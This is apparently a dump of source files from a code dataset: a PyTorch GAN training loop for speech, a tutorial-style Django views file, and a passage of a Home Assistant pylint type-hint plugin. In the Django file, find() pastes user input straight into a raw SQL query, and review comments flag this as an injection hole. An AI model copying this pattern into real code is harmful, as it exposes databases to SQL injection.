    return torch.randn(batch, dim1).cuda()
def recon_criterion(x, y):
    """Mean absolute error (L1 reconstruction loss) between x and y."""
    return (x - y).abs().mean()
def train():
    """Train the MUNIT-style GAN that maps between noisy (A) and clean (B) speech.

    Builds the data loaders, two generator/discriminator pairs plus content and
    style encoders, then alternates discriminator and generator updates with an
    LSGAN adversarial objective, logging losses and checkpointing every network
    at fixed iteration intervals.
    """
    hparams = get_hparams()
    # Checkpoints are written under <model_path>/<task_name>/<spec_opt>.
    model_path = os.path.join( hparams.model_path, hparams.task_name, hparams.spec_opt )
    if not os.path.exists(model_path):
        os.makedirs(model_path)
    # Load Dataset Loader
    # Domain A = noisy spectra, domain B = clean spectra; each normalizer
    # squashes its domain into tanh range before batching.
    normalizer_clean = Tanhize('clean')
    normalizer_noisy = Tanhize('noisy')
    print('Load dataset2d loader')
    dataset_A_2d = npyDataset2d(hparams.dataset_root,hparams.list_dir_train_A_2d, hparams.frame_len, normalizer = normalizer_noisy)
    dataset_B_2d = npyDataset2d(hparams.dataset_root,hparams.list_dir_train_B_2d, hparams.frame_len, normalizer = normalizer_clean)
    dataloader_A = DataLoader(dataset_A_2d, batch_size = hparams.batch_size,
                shuffle = True,
                drop_last = True,
                )
    dataloader_B = DataLoader(dataset_B_2d, batch_size = hparams.batch_size,
                shuffle = True,
                drop_last = True,
                )
    # Load Generator / Disciminator model
    generator_A = Generator()
    generator_B = Generator()
    discriminator_A = Discriminator()
    discriminator_B = Discriminator()
    ContEncoder_A = ContentEncoder()
    ContEncoder_B = ContentEncoder()
    StEncoder_A = StyleEncoder()
    StEncoder_B = StyleEncoder()
    # DCGAN-style initialization (see weights_init) for every network.
    generator_A.apply(weights_init)
    generator_B.apply(weights_init)
    discriminator_A.apply(weights_init)
    discriminator_B.apply(weights_init)
    ContEncoder_A.apply(weights_init)
    ContEncoder_B.apply(weights_init)
    StEncoder_A.apply(weights_init)
    StEncoder_B.apply(weights_init)
    # Target label tensors for the LSGAN objective (1 = real, 0 = fake).
    real_label = 1
    fake_label = 0
    real_tensor = Variable(torch.FloatTensor(hparams.batch_size))
    _ = real_tensor.data.fill_(real_label)
    fake_tensor = Variable(torch.FloatTensor(hparams.batch_size))
    _ = fake_tensor.data.fill_(fake_label)
    # Define Loss function
    # NOTE(review): d and bce are instantiated but the loop below computes the
    # LSGAN losses inline with torch.mean(...); confirm they are still needed.
    d = nn.MSELoss()
    bce = nn.BCELoss()
    # Cuda Process
    if hparams.cuda == True:
        print('-- Activate with CUDA --')
        generator_A = nn.DataParallel(generator_A).cuda()
        generator_B = nn.DataParallel(generator_B).cuda()
        discriminator_A = nn.DataParallel(discriminator_A).cuda()
        discriminator_B = nn.DataParallel(discriminator_B).cuda()
        ContEncoder_A = nn.DataParallel(ContEncoder_A).cuda()
        ContEncoder_B = nn.DataParallel(ContEncoder_B).cuda()
        StEncoder_A = nn.DataParallel(StEncoder_A).cuda()
        StEncoder_B = nn.DataParallel(StEncoder_B).cuda()
        d.cuda()
        bce.cuda()
        real_tensor = real_tensor.cuda()
        fake_tensor = fake_tensor.cuda()
    else:
        print('-- Activate without CUDA --')
    # One Adam optimizer over all generator-side networks, one over both critics.
    gen_params = chain(
        generator_A.parameters(),
        generator_B.parameters(),
        ContEncoder_A.parameters(),
        ContEncoder_B.parameters(),
        StEncoder_A.parameters(),
        StEncoder_B.parameters(),
    )
    dis_params = chain(
        discriminator_A.parameters(),
        discriminator_B.parameters(),
    )
    optimizer_g = optim.Adam( gen_params, lr=hparams.learning_rate)
    optimizer_d = optim.Adam( dis_params, lr=hparams.learning_rate)
    iters = 0
    for e in range(hparams.epoch_size):
        # input Tensor
        A_loader, B_loader = iter(dataloader_A), iter(dataloader_B)
        for i in range(len(A_loader)-1):
            # NOTE(review): ``iterator.next()`` is the Python 2 protocol; on
            # Python 3 / current PyTorch this must be ``next(A_loader)`` —
            # confirm against the project's pinned environment.
            batch_A = A_loader.next()
            batch_B = B_loader.next()
            A_indx = torch.LongTensor(list( range(hparams.batch_size)))
            B_indx = torch.LongTensor(list( range(hparams.batch_size)))
            A_ = torch.FloatTensor(batch_A)
            B_ = torch.FloatTensor(batch_B)
            if hparams.cuda == True:
                x_A = Variable(A_.cuda())
                x_B = Variable(B_.cuda())
            else:
                x_A = Variable(A_)
                x_B = Variable(B_)
            real_tensor.data.resize_(hparams.batch_size).fill_(real_label)
            fake_tensor.data.resize_(hparams.batch_size).fill_(fake_label)
            ## Discrominator Update Steps
            discriminator_A.zero_grad()
            discriminator_B.zero_grad()
            # x_A, x_B, x_AB, x_BA
            # [#_batch, max_time_len, dim]
            # detach() keeps encoder/generator graphs out of the critic update.
            A_c = ContEncoder_A(x_A).detach()
            B_c = ContEncoder_B(x_B).detach()
            # A,B : N ~ (0,1)
            A_s = Variable(get_z_random(hparams.batch_size, 8))
            B_s = Variable(get_z_random(hparams.batch_size, 8))
            x_AB = generator_B(A_c, B_s).detach()
            x_BA = generator_A(B_c, A_s).detach()
            # We recommend LSGAN-loss for adversarial loss
            l_d_A_real = 0.5 * torch.mean( (discriminator_A(x_A) - real_tensor) **2 )
            l_d_A_fake = 0.5 * torch.mean( (discriminator_A(x_BA) - fake_tensor) **2 )
            l_d_B_real = 0.5 * torch.mean( (discriminator_B(x_B) - real_tensor)** 2)
            l_d_B_fake = 0.5 * torch.mean( (discriminator_B(x_AB) - fake_tensor) ** 2)
            l_d_A = l_d_A_real + l_d_A_fake
            l_d_B = l_d_B_real + l_d_B_fake
            l_d = l_d_A + l_d_B
            l_d.backward()
            optimizer_d.step()
            ## Generator Update Steps
            generator_A.zero_grad()
            generator_B.zero_grad()
            ContEncoder_A.zero_grad()
            ContEncoder_B.zero_grad()
            StEncoder_A.zero_grad()
            StEncoder_B.zero_grad()
            # Fresh (non-detached) encodings so gradients reach the encoders.
            A_c = ContEncoder_A(x_A)
            B_c = ContEncoder_B(x_B)
            A_s_prime = StEncoder_A(x_A)
            B_s_prime = StEncoder_B(x_B)
            # A,B : N ~ (0,1)
            A_s = Variable(get_z_random(hparams.batch_size, 8))
            B_s = Variable(get_z_random(hparams.batch_size, 8))
            # Cross-domain translations and within-domain reconstructions.
            x_BA = generator_A(B_c, A_s)
            x_AB = generator_B(A_c, B_s)
            x_A_recon = generator_A(A_c, A_s_prime)
            x_B_recon = generator_B(B_c, B_s_prime)
            # Re-encode the translations to enforce content/style consistency.
            B_c_recon = ContEncoder_A(x_BA)
            A_s_recon = StEncoder_A(x_BA)
            A_c_recon = ContEncoder_B(x_AB)
            B_s_recon = StEncoder_B(x_AB)
            x_ABA = generator_A(A_c_recon, A_s_prime)
            x_BAB = generator_B(B_c_recon, B_s_prime)
            # L1 cycle (cy), self-reconstruction (f), content (c) and style (s) terms.
            l_cy_A = recon_criterion(x_ABA, x_A)
            l_cy_B = recon_criterion(x_BAB, x_B)
            l_f_A = recon_criterion(x_A_recon, x_A)
            l_f_B = recon_criterion(x_B_recon, x_B)
            l_c_A = recon_criterion(A_c_recon, A_c)
            l_c_B = recon_criterion(B_c_recon, B_c)
            l_s_A = recon_criterion(A_s_recon, A_s)
            l_s_B = recon_criterion(B_s_recon, B_s)
            # We recommend LSGAN-loss for adversarial loss
            l_gan_A = 0.5 * torch.mean( (discriminator_A(x_BA) - real_tensor) **2)
            l_gan_B = 0.5 * torch.mean( (discriminator_B(x_AB) - real_tensor ) **2)
            # Weighted total generator loss (lambda_* are module-level weights).
            l_g = l_gan_A + l_gan_B + lambda_f *( l_f_A + l_f_B) + lambda_s * (l_s_A + l_s_B) + lambda_c * (l_c_A + l_c_B) + lambda_cy * ( l_cy_A + l_cy_B)
            l_g.backward()
            optimizer_g.step()
            if iters % hparams.log_interval == 0:
                print ("---------------------")
                print ("Gen Loss :{} disc loss :{}".format(l_g/hparams.batch_size , l_d/hparams.batch_size))
                print ("epoch :" , e , " " , "total ", hparams.epoch_size)
                print ("iteration :", iters )
            if iters % hparams.model_save_interval == 0:
                # Persist every network so training can resume or be evaluated.
                torch.save( generator_A.state_dict(), os.path.join(model_path, 'model_gen_A_{}.pth'.format(iters)))
                torch.save( generator_B.state_dict(), os.path.join(model_path, 'model_gen_B_{}.pth'.format(iters)))
                torch.save( discriminator_A.state_dict(), os.path.join(model_path, 'model_dis_A_{}.pth'.format(iters)))
                torch.save( discriminator_B.state_dict(), os.path.join(model_path, 'model_dis_B_{}.pth'.format(iters)))
                torch.save( ContEncoder_A.state_dict(), os.path.join(model_path, 'model_ContEnc_A_{}.pth'.format(iters)))
                torch.save( ContEncoder_B.state_dict(), os.path.join(model_path, 'model_ContEnc_B_{}.pth'.format(iters)))
                torch.save( StEncoder_A.state_dict(), os.path.join(model_path, 'model_StEnc_A_{}.pth'.format(iters)))
                torch.save( StEncoder_B.state_dict(), os.path.join(model_path, 'model_StEnc_B_{}.pth'.format(iters)))
            iters += 1
# Script entry point: run the full GAN training loop when invoked directly.
if __name__ == '__main__':
    train()
| [
"pjh2176@gmail.com"
] | pjh2176@gmail.com |
db8a93e0e6d424d73864946b6ab40104db99a020 | 7df03e95ee65072b49520c00509445d6b059bcea | /hello/views.py | a054b8beb1b327c7f7df3e7106a13f3e7da3c785 | [] | no_license | yunsunghyun/django_app | 85015fbaf48dff6acf2346d32aef70575af4ad07 | f742f8347408e90e1f6559d9c0e8fe0213f86fe2 | refs/heads/master | 2020-05-07T14:45:38.305417 | 2019-05-26T10:27:00 | 2019-05-26T10:27:00 | 180,607,867 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,007 | py | from django.core.paginator import Paginator
from django.db.models import Q, Count, Sum, Avg, Min, Max
from django.shortcuts import render, redirect
from hello.forms import MessageForm
from hello.models import Message
from .models import Friend
from .forms import FriendForm, FindForm, CheckForm
def index(request, num=1):
    """Render a paginated listing of every Friend record (2 per page)."""
    friends = Friend.objects.all()
    paginator = Paginator(friends, 2)
    context = {
        'title': 'Hello',
        'message': '',
        'data': paginator.get_page(num),
    }
    return render(request, 'hello/index.html', context)
# create model
def create(request):
    """Show an empty FriendForm; on POST, persist a new Friend and redirect."""
    if request.method == 'POST':
        new_friend = Friend()
        bound_form = FriendForm(request.POST, instance=new_friend)
        bound_form.save()
        return redirect(to='/hello')
    context = {
        'title': 'Hello',
        'form': FriendForm(),
    }
    return render(request, 'hello/create.html', context)
def edit(request, num):
    """Edit the Friend with primary key *num*; save on POST, else show the form."""
    target = Friend.objects.get(id=num)
    if request.method == 'POST':
        bound_form = FriendForm(request.POST, instance=target)
        bound_form.save()
        return redirect(to='/hello')
    context = {
        'title': 'Hello',
        'id': num,
        'form': FriendForm(instance=target)
    }
    return render(request, 'hello/edit.html', context)
def delete(request, num):
    """Show a confirmation page for the Friend *num*; delete it on POST."""
    target = Friend.objects.get(id=num)
    if request.method == 'POST':
        target.delete()
        return redirect(to='/hello')
    context = {
        'title': 'Hello',
        'id': num,
        'obj': target,
    }
    return render(request, 'hello/delete.html', context)
def find(request):
    """Search Friend records using a user-supplied raw SQL WHERE clause.

    SECURITY NOTE(review): the POSTed ``find`` value is concatenated verbatim
    into a raw SQL statement below — a textbook SQL-injection hole.  This may
    be intentional for a tutorial, but must not ship as-is; use parameterized
    queries (``Friend.objects.raw(sql, params)``) or ORM filters instead.
    """
    if request.method == 'POST':
        msg = request.POST['find']
        form = FindForm(request.POST)
        sql = 'select * from hello_friend'
        if msg != '':
            # WARNING: untrusted input appended directly to SQL (injection risk).
            sql += ' where ' + msg
        data = Friend.objects.raw(sql)
        # Echo the executed SQL back to the template as the status message.
        msg = sql
    else:
        msg = 'search words...'
        form = FindForm()
        data = Friend.objects.all()
    params = {
        'title': 'Hello',
        'message': msg,
        'form': form,
        'data': data,
    }
    return render(request, 'hello/find.html', params)
def check(request):
    """Validate posted FriendForm data without saving and report the outcome."""
    context = {
        'title': 'Hello',
        'message': 'check validation. ',
        'form': CheckForm(),
    }
    if request.method == 'POST':
        candidate = Friend()
        bound_form = FriendForm(request.POST, instance=candidate)
        context['form'] = bound_form
        context['message'] = 'OK!' if bound_form.is_valid() else 'no good.'
    return render(request, 'hello/check.html', context)
def message(request, page=1):
    """Store a posted Message (if any), then render messages five per page."""
    if request.method == 'POST':
        new_message = Message()
        bound_form = MessageForm(request.POST, instance=new_message)
        bound_form.save()
    records = Message.objects.all().reverse()
    pager = Paginator(records, 5)
    context = {
        'title': 'Messagee',  # NOTE(review): looks like a typo for 'Message' — confirm template usage
        'form': MessageForm(),
        'data': pager.get_page(page),
    }
    return render(request, 'hello/message.html', context)
| [
"ysh151@naver.com"
] | ysh151@naver.com |
0820a6cc602ef2fd357b40e1e1a7c23ad21f9e2a | 728227574c3bcf209bbf3ebc9ccc0ffb549b80d4 | /pylint/plugins/hass_enforce_type_hints.py | 9ec2fa838065201512aa57d0a0bd488d20c0efc3 | [
"Apache-2.0"
] | permissive | jrester/home-assistant | e016e8d4b2843792dcb3a9e85b3060db204034a8 | eb6afd27b312ed2910a1ad32aa20a3f4ebd54cf8 | refs/heads/dev | 2023-03-04T23:02:52.667683 | 2022-06-25T10:34:30 | 2022-06-25T10:34:30 | 200,057,420 | 0 | 0 | Apache-2.0 | 2023-02-22T06:14:56 | 2019-08-01T13:37:48 | Python | UTF-8 | Python | false | false | 28,504 | py | """Plugin to enforce type hints on specific functions."""
from __future__ import annotations
from dataclasses import dataclass
import re
from astroid import nodes
from pylint.checkers import BaseChecker
from pylint.lint import PyLinter
from homeassistant.const import Platform
UNDEFINED = object()
_PLATFORMS: set[str] = {platform.value for platform in Platform}
@dataclass
class TypeHintMatch:
    """Describes the expected type hints for one checked function."""

    function_name: str
    return_type: list[str] | str | None | object
    arg_types: dict[int, str] | None = None
    """arg_types is for positional arguments"""
    named_arg_types: dict[str, str] | None = None
    """named_arg_types is for named or keyword arguments"""
    kwargs_type: str | None = None
    """kwargs_type is for the special case `**kwargs`"""
    check_return_type_inheritance: bool = False
    has_async_counterpart: bool = False

    def need_to_check_function(self, node: nodes.FunctionDef) -> bool:
        """Confirm if function should be checked."""
        expected = self.function_name
        if node.name == expected:
            return True
        # When an async twin exists, "async_<name>" is checked with the same rules.
        return self.has_async_counterpart and node.name == f"async_{expected}"
@dataclass
class ClassTypeHintMatch:
    """Class for pattern matching.

    Associates a list of ``TypeHintMatch`` rules with the name of the base
    class whose subclasses' methods they apply to.
    """

    # Name of the base class that triggers these checks (matched by ancestry).
    base_class: str
    # Type-hint rules applied to methods of classes inheriting from base_class.
    matches: list[TypeHintMatch]
_TYPE_HINT_MATCHERS: dict[str, re.Pattern[str]] = {
# a_or_b matches items such as "DiscoveryInfoType | None"
"a_or_b": re.compile(r"^(\w+) \| (\w+)$"),
# x_of_y matches items such as "Awaitable[None]"
"x_of_y": re.compile(r"^(\w+)\[(.*?]*)\]$"),
# x_of_y_comma_z matches items such as "Callable[..., Awaitable[None]]"
"x_of_y_comma_z": re.compile(r"^(\w+)\[(.*?]*), (.*?]*)\]$"),
# x_of_y_of_z_comma_a matches items such as "list[dict[str, Any]]"
"x_of_y_of_z_comma_a": re.compile(r"^(\w+)\[(\w+)\[(.*?]*), (.*?]*)\]\]$"),
}
_MODULE_REGEX: re.Pattern[str] = re.compile(r"^homeassistant\.components\.\w+(\.\w+)?$")
_FUNCTION_MATCH: dict[str, list[TypeHintMatch]] = {
"__init__": [
TypeHintMatch(
function_name="setup",
arg_types={
0: "HomeAssistant",
1: "ConfigType",
},
return_type="bool",
has_async_counterpart=True,
),
TypeHintMatch(
function_name="async_setup_entry",
arg_types={
0: "HomeAssistant",
1: "ConfigEntry",
},
return_type="bool",
),
TypeHintMatch(
function_name="async_remove_entry",
arg_types={
0: "HomeAssistant",
1: "ConfigEntry",
},
return_type=None,
),
TypeHintMatch(
function_name="async_unload_entry",
arg_types={
0: "HomeAssistant",
1: "ConfigEntry",
},
return_type="bool",
),
TypeHintMatch(
function_name="async_migrate_entry",
arg_types={
0: "HomeAssistant",
1: "ConfigEntry",
},
return_type="bool",
),
TypeHintMatch(
function_name="async_remove_config_entry_device",
arg_types={
0: "HomeAssistant",
1: "ConfigEntry",
2: "DeviceEntry",
},
return_type="bool",
),
],
"__any_platform__": [
TypeHintMatch(
function_name="setup_platform",
arg_types={
0: "HomeAssistant",
1: "ConfigType",
2: "AddEntitiesCallback",
3: "DiscoveryInfoType | None",
},
return_type=None,
has_async_counterpart=True,
),
TypeHintMatch(
function_name="async_setup_entry",
arg_types={
0: "HomeAssistant",
1: "ConfigEntry",
2: "AddEntitiesCallback",
},
return_type=None,
),
],
"application_credentials": [
TypeHintMatch(
function_name="async_get_auth_implementation",
arg_types={
0: "HomeAssistant",
1: "str",
2: "ClientCredential",
},
return_type="AbstractOAuth2Implementation",
),
TypeHintMatch(
function_name="async_get_authorization_server",
arg_types={
0: "HomeAssistant",
},
return_type="AuthorizationServer",
),
],
"backup": [
TypeHintMatch(
function_name="async_pre_backup",
arg_types={
0: "HomeAssistant",
},
return_type=None,
),
TypeHintMatch(
function_name="async_post_backup",
arg_types={
0: "HomeAssistant",
},
return_type=None,
),
],
"cast": [
TypeHintMatch(
function_name="async_get_media_browser_root_object",
arg_types={
0: "HomeAssistant",
1: "str",
},
return_type="list[BrowseMedia]",
),
TypeHintMatch(
function_name="async_browse_media",
arg_types={
0: "HomeAssistant",
1: "str",
2: "str",
3: "str",
},
return_type=["BrowseMedia", "BrowseMedia | None"],
),
TypeHintMatch(
function_name="async_play_media",
arg_types={
0: "HomeAssistant",
1: "str",
2: "Chromecast",
3: "str",
4: "str",
},
return_type="bool",
),
],
"config_flow": [
TypeHintMatch(
function_name="_async_has_devices",
arg_types={
0: "HomeAssistant",
},
return_type="bool",
),
],
"device_action": [
TypeHintMatch(
function_name="async_validate_action_config",
arg_types={
0: "HomeAssistant",
1: "ConfigType",
},
return_type="ConfigType",
),
TypeHintMatch(
function_name="async_call_action_from_config",
arg_types={
0: "HomeAssistant",
1: "ConfigType",
2: "TemplateVarsType",
3: "Context | None",
},
return_type=None,
),
TypeHintMatch(
function_name="async_get_action_capabilities",
arg_types={
0: "HomeAssistant",
1: "ConfigType",
},
return_type="dict[str, Schema]",
),
TypeHintMatch(
function_name="async_get_actions",
arg_types={
0: "HomeAssistant",
1: "str",
},
return_type=["list[dict[str, str]]", "list[dict[str, Any]]"],
),
],
"device_condition": [
TypeHintMatch(
function_name="async_validate_condition_config",
arg_types={
0: "HomeAssistant",
1: "ConfigType",
},
return_type="ConfigType",
),
TypeHintMatch(
function_name="async_condition_from_config",
arg_types={
0: "HomeAssistant",
1: "ConfigType",
},
return_type="ConditionCheckerType",
),
TypeHintMatch(
function_name="async_get_condition_capabilities",
arg_types={
0: "HomeAssistant",
1: "ConfigType",
},
return_type="dict[str, Schema]",
),
TypeHintMatch(
function_name="async_get_conditions",
arg_types={
0: "HomeAssistant",
1: "str",
},
return_type=["list[dict[str, str]]", "list[dict[str, Any]]"],
),
],
"device_tracker": [
TypeHintMatch(
function_name="setup_scanner",
arg_types={
0: "HomeAssistant",
1: "ConfigType",
2: "Callable[..., None]",
3: "DiscoveryInfoType | None",
},
return_type="bool",
),
TypeHintMatch(
function_name="async_setup_scanner",
arg_types={
0: "HomeAssistant",
1: "ConfigType",
2: "Callable[..., Awaitable[None]]",
3: "DiscoveryInfoType | None",
},
return_type="bool",
),
TypeHintMatch(
function_name="get_scanner",
arg_types={
0: "HomeAssistant",
1: "ConfigType",
},
return_type=["DeviceScanner", "DeviceScanner | None"],
has_async_counterpart=True,
),
],
"device_trigger": [
TypeHintMatch(
function_name="async_validate_condition_config",
arg_types={
0: "HomeAssistant",
1: "ConfigType",
},
return_type="ConfigType",
),
TypeHintMatch(
function_name="async_attach_trigger",
arg_types={
0: "HomeAssistant",
1: "ConfigType",
2: "AutomationActionType",
3: "AutomationTriggerInfo",
},
return_type="CALLBACK_TYPE",
),
TypeHintMatch(
function_name="async_get_trigger_capabilities",
arg_types={
0: "HomeAssistant",
1: "ConfigType",
},
return_type="dict[str, Schema]",
),
TypeHintMatch(
function_name="async_get_triggers",
arg_types={
0: "HomeAssistant",
1: "str",
},
return_type=["list[dict[str, str]]", "list[dict[str, Any]]"],
),
],
"diagnostics": [
TypeHintMatch(
function_name="async_get_config_entry_diagnostics",
arg_types={
0: "HomeAssistant",
1: "ConfigEntry",
},
return_type=UNDEFINED,
),
TypeHintMatch(
function_name="async_get_device_diagnostics",
arg_types={
0: "HomeAssistant",
1: "ConfigEntry",
2: "DeviceEntry",
},
return_type=UNDEFINED,
),
],
}
_CLASS_MATCH: dict[str, list[ClassTypeHintMatch]] = {
"config_flow": [
ClassTypeHintMatch(
base_class="ConfigFlow",
matches=[
TypeHintMatch(
function_name="async_get_options_flow",
arg_types={
0: "ConfigEntry",
},
return_type="OptionsFlow",
check_return_type_inheritance=True,
),
TypeHintMatch(
function_name="async_step_dhcp",
arg_types={
1: "DhcpServiceInfo",
},
return_type="FlowResult",
),
TypeHintMatch(
function_name="async_step_hassio",
arg_types={
1: "HassioServiceInfo",
},
return_type="FlowResult",
),
TypeHintMatch(
function_name="async_step_homekit",
arg_types={
1: "ZeroconfServiceInfo",
},
return_type="FlowResult",
),
TypeHintMatch(
function_name="async_step_mqtt",
arg_types={
1: "MqttServiceInfo",
},
return_type="FlowResult",
),
TypeHintMatch(
function_name="async_step_ssdp",
arg_types={
1: "SsdpServiceInfo",
},
return_type="FlowResult",
),
TypeHintMatch(
function_name="async_step_usb",
arg_types={
1: "UsbServiceInfo",
},
return_type="FlowResult",
),
TypeHintMatch(
function_name="async_step_zeroconf",
arg_types={
1: "ZeroconfServiceInfo",
},
return_type="FlowResult",
),
],
),
],
}
# Overriding properties and functions are normally checked by mypy, and will only
# be checked by pylint when --ignore-missing-annotations is False
_TOGGLE_ENTITY_MATCH: list[TypeHintMatch] = [
TypeHintMatch(
function_name="is_on",
return_type=["bool", None],
),
TypeHintMatch(
function_name="turn_on",
kwargs_type="Any",
return_type=None,
has_async_counterpart=True,
),
TypeHintMatch(
function_name="turn_off",
kwargs_type="Any",
return_type=None,
has_async_counterpart=True,
),
TypeHintMatch(
function_name="toggle",
kwargs_type="Any",
return_type=None,
has_async_counterpart=True,
),
]
_INHERITANCE_MATCH: dict[str, list[ClassTypeHintMatch]] = {
"fan": [
ClassTypeHintMatch(
base_class="ToggleEntity",
matches=_TOGGLE_ENTITY_MATCH,
),
ClassTypeHintMatch(
base_class="FanEntity",
matches=[
TypeHintMatch(
function_name="percentage",
return_type=["int", None],
),
TypeHintMatch(
function_name="speed_count",
return_type="int",
),
TypeHintMatch(
function_name="percentage_step",
return_type="float",
),
TypeHintMatch(
function_name="current_direction",
return_type=["str", None],
),
TypeHintMatch(
function_name="oscillating",
return_type=["bool", None],
),
TypeHintMatch(
function_name="capability_attributes",
return_type="dict[str]",
),
TypeHintMatch(
function_name="supported_features",
return_type="int",
),
TypeHintMatch(
function_name="preset_mode",
return_type=["str", None],
),
TypeHintMatch(
function_name="preset_modes",
return_type=["list[str]", None],
),
TypeHintMatch(
function_name="set_percentage",
arg_types={1: "int"},
return_type=None,
has_async_counterpart=True,
),
TypeHintMatch(
function_name="set_preset_mode",
arg_types={1: "str"},
return_type=None,
has_async_counterpart=True,
),
TypeHintMatch(
function_name="set_direction",
arg_types={1: "str"},
return_type=None,
has_async_counterpart=True,
),
TypeHintMatch(
function_name="turn_on",
named_arg_types={
"percentage": "int | None",
"preset_mode": "str | None",
},
kwargs_type="Any",
return_type=None,
has_async_counterpart=True,
),
TypeHintMatch(
function_name="oscillate",
arg_types={1: "bool"},
return_type=None,
has_async_counterpart=True,
),
],
),
],
"lock": [
ClassTypeHintMatch(
base_class="LockEntity",
matches=[
TypeHintMatch(
function_name="changed_by",
return_type=["str", None],
),
TypeHintMatch(
function_name="code_format",
return_type=["str", None],
),
TypeHintMatch(
function_name="is_locked",
return_type=["bool", None],
),
TypeHintMatch(
function_name="is_locking",
return_type=["bool", None],
),
TypeHintMatch(
function_name="is_unlocking",
return_type=["bool", None],
),
TypeHintMatch(
function_name="is_jammed",
return_type=["bool", None],
),
TypeHintMatch(
function_name="lock",
kwargs_type="Any",
return_type=None,
has_async_counterpart=True,
),
TypeHintMatch(
function_name="unlock",
kwargs_type="Any",
return_type=None,
has_async_counterpart=True,
),
TypeHintMatch(
function_name="open",
kwargs_type="Any",
return_type=None,
has_async_counterpart=True,
),
],
),
],
}
def _is_valid_type(
    expected_type: list[str] | str | None | object, node: nodes.NodeNG
) -> bool:
    """Check the argument node against the expected type.

    *expected_type* may be the UNDEFINED sentinel (anything passes), a list of
    alternatives (any one may match), None / "None", "...", or a string type
    expression matched structurally against the astroid annotation *node*.
    """
    if expected_type is UNDEFINED:
        return True
    # A list of alternatives: valid if any single alternative matches.
    if isinstance(expected_type, list):
        for expected_type_item in expected_type:
            if _is_valid_type(expected_type_item, node):
                return True
        return False
    # Const occurs when the type is None
    if expected_type is None or expected_type == "None":
        return isinstance(node, nodes.Const) and node.value is None
    assert isinstance(expected_type, str)
    # Const occurs when the type is an Ellipsis
    if expected_type == "...":
        return isinstance(node, nodes.Const) and node.value == Ellipsis
    # Special case for `xxx | yyy` (PEP 604 union is a BinOp in the AST)
    if match := _TYPE_HINT_MATCHERS["a_or_b"].match(expected_type):
        return (
            isinstance(node, nodes.BinOp)
            and _is_valid_type(match.group(1), node.left)
            and _is_valid_type(match.group(2), node.right)
        )
    # Special case for `xxx[yyy[zzz, aaa]]` (nested two-argument subscript)
    if match := _TYPE_HINT_MATCHERS["x_of_y_of_z_comma_a"].match(expected_type):
        return (
            isinstance(node, nodes.Subscript)
            and _is_valid_type(match.group(1), node.value)
            and isinstance(subnode := node.slice, nodes.Subscript)
            and _is_valid_type(match.group(2), subnode.value)
            and isinstance(subnode.slice, nodes.Tuple)
            and _is_valid_type(match.group(3), subnode.slice.elts[0])
            and _is_valid_type(match.group(4), subnode.slice.elts[1])
        )
    # Special case for `xxx[yyy, zzz]` (two-argument subscript)
    if match := _TYPE_HINT_MATCHERS["x_of_y_comma_z"].match(expected_type):
        return (
            isinstance(node, nodes.Subscript)
            and _is_valid_type(match.group(1), node.value)
            and isinstance(node.slice, nodes.Tuple)
            and _is_valid_type(match.group(2), node.slice.elts[0])
            and _is_valid_type(match.group(3), node.slice.elts[1])
        )
    # Special case for `xxx[yyy]` (single-argument subscript)
    if match := _TYPE_HINT_MATCHERS["x_of_y"].match(expected_type):
        return (
            isinstance(node, nodes.Subscript)
            and _is_valid_type(match.group(1), node.value)
            and _is_valid_type(match.group(2), node.slice)
        )
    # Name occurs when a namespace is not used, eg. "HomeAssistant"
    if isinstance(node, nodes.Name) and node.name == expected_type:
        return True
    # Attribute occurs when a namespace is used, eg. "core.HomeAssistant"
    return isinstance(node, nodes.Attribute) and node.attrname == expected_type
def _is_valid_return_type(match: TypeHintMatch, node: nodes.NodeNG) -> bool:
    """Check the return annotation *node* against *match*.

    Accepts an exact type match, a PEP 604 union whose members all match,
    or (when ``check_return_type_inheritance`` is enabled) any class that
    inherits from the expected return type.
    """
    if _is_valid_type(match.return_type, node):
        return True
    # A union (`X | Y`) return is valid only if every member is valid.
    if isinstance(node, nodes.BinOp):
        return _is_valid_return_type(match, node.left) and _is_valid_return_type(
            match, node.right
        )
    if (
        match.check_return_type_inheritance
        and isinstance(match.return_type, str)
        and isinstance(node, nodes.Name)
    ):
        ancestor: nodes.ClassDef
        # Infer the annotation to a class and accept it or any of its ancestors.
        for infer_node in node.infer():
            if isinstance(infer_node, nodes.ClassDef):
                if infer_node.name == match.return_type:
                    return True
                for ancestor in infer_node.ancestors():
                    if ancestor.name == match.return_type:
                        return True
    return False
def _get_all_annotations(node: nodes.FunctionDef) -> list[nodes.NodeNG | None]:
args = node.args
annotations: list[nodes.NodeNG | None] = (
args.posonlyargs_annotations + args.annotations + args.kwonlyargs_annotations
)
if args.vararg is not None:
annotations.append(args.varargannotation)
if args.kwarg is not None:
annotations.append(args.kwargannotation)
return annotations
def _get_named_annotation(
node: nodes.FunctionDef, key: str
) -> tuple[nodes.NodeNG, nodes.NodeNG] | tuple[None, None]:
args = node.args
for index, arg_node in enumerate(args.args):
if key == arg_node.name:
return arg_node, args.annotations[index]
for index, arg_node in enumerate(args.kwonlyargs):
if key == arg_node.name:
return arg_node, args.kwonlyargs_annotations[index]
return None, None
def _has_valid_annotations(
annotations: list[nodes.NodeNG | None],
) -> bool:
for annotation in annotations:
if annotation is not None:
return True
return False
def _get_module_platform(module_name: str) -> str | None:
    """Extract the platform part of a component module name.

    Returns the platform for ``homeassistant.components.<component>.<platform>``,
    ``"__init__"`` for ``homeassistant.components.<component>``, and None for
    anything outside the components namespace.
    """
    module_match = _MODULE_REGEX.match(module_name)
    if module_match is None:
        return None
    platform = module_match.groups()[0]
    if not platform:
        return "__init__"
    return platform.lstrip(".")
class HassTypeHintChecker(BaseChecker):  # type: ignore[misc]
    """Checker for setup type hints."""

    name = "hass_enforce_type_hints"
    priority = -1
    msgs = {
        "W7431": (
            "Argument %s should be of type %s",
            "hass-argument-type",
            "Used when method argument type is incorrect",
        ),
        "W7432": (
            "Return type should be %s",
            "hass-return-type",
            "Used when method return type is incorrect",
        ),
    }
    options = (
        (
            "ignore-missing-annotations",
            {
                "default": True,
                "type": "yn",
                "metavar": "<y or n>",
                "help": "Set to ``no`` if you wish to check functions that do not "
                "have any type hints.",
            },
        ),
    )

    def __init__(self, linter: PyLinter | None = None) -> None:
        """Initialize the checker with empty per-module matcher lists."""
        super().__init__(linter)
        # Matchers for module-level functions of the module being visited.
        self._function_matchers: list[TypeHintMatch] = []
        # Matchers for classes (keyed by base class) of the module being visited.
        self._class_matchers: list[ClassTypeHintMatch] = []

    def visit_module(self, node: nodes.Module) -> None:
        """Called when a Module node is visited."""
